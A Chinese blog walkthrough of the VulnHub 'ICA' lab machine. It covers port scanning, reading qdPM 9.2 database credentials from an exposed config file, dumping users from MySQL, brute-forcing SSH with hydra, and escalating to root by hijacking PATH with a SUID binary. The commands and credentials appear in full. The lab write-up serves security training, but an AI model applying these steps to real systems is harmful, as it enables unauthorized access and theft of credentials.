靶场环境:
kali攻击机:10.21.29.198
靶机:10.21.29.227
信息收集
首先进行端口扫描:
发现22 80 3306端口
登录80端口发现是一登录页面
首先可以看到CMS:qdPM9.2
攻击过程
kali进行漏洞库搜索:
searchsploit qdPM 9.2
查看漏洞详情:
```
cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
```
意思是:数据库的密码和连接字符串存储在yml文件中。要访问yml文件,你可以进入http://IP/core/config/databases.yml文件并下载
![](/i/l/?n=23&i=blog/2607747/202305/2607747-20230511180812460-1499397259.png" width="50%" height="50%" />
得到数据库用户名和密码:
username:qdpmadmin
password:UcVQCMQk2STVeS6J
直接远程连接Mysql 并发现staff数据库中有密码和用户名 猜想可进行SSH登录
mysql -u qdpmadmin -h 10.21.29.227 -p
然后将用户名和文件保存到文件里进行SSH爆破(用户名更改为小写)
hydra -L users.txt -P passwd.txt ssh://10.21.29.227
login: dexter password: 7ZwV4qtg42cmUXGX
login: travis password: DJceVy98W28Y7wLg
尝试远程SSH登录
成功发现CIA项目,不过还有一个用户,继续登录
提示说有可执行文件,并且它有一部分是可见的,我们查找一下具有root权限的可执行的文件
find / -perm -u=s 2>/dev/null
用Strings 进行查看
```
strings /opt/get_access
```
这个cat命令它并没有指定是哪个文件夹下的cat命令所以我们可以创建一个名为cat的文件,内容写上"/bin/bash",然后把它添加到环境变量,就可以提权
然后我们直接运行get_access就可以了
成功获取最终flag:特工任务完成
标签:10.21,用户名,登录,文件,ICA,cat,vulnhub,yml From: https://www.cnblogs.com/SmallVoter/p/17391946.html